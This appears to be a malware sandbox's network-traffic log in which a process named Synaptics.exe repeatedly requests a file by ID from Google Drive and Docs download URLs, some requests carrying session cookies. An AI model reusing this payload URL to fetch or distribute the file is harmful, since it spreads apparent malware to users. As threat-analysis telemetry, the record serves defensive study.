                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=qh-ukOUmpKIDdd1kgysVqyDq4zWsJ3HmMeD46WA0aLR-4CYLV_2_v68_hqe_miGaxKY1bijQI_MR8_5g85RzwpdTn5SeN-ED-kuHC-65e4kwQ3LCdHoRfa9--p6JzsbuU2Mu4UYOgCEH1x6aeybzksX3kbew952WrBqFseVauF_lXWFZTMTi7f7c
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=qh-ukOUmpKIDdd1kgysVqyDq4zWsJ3HmMeD46WA0aLR-4CYLV_2_v68_hqe_miGaxKY1bijQI_MR8_5g85RzwpdTn5SeN-ED-kuHC-65e4kwQ3LCdHoRfa9--p6JzsbuU2Mu4UYOgCEH1x6aeybzksX3kbew952WrBqFseVauF_lXWFZTMTi7f7c
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
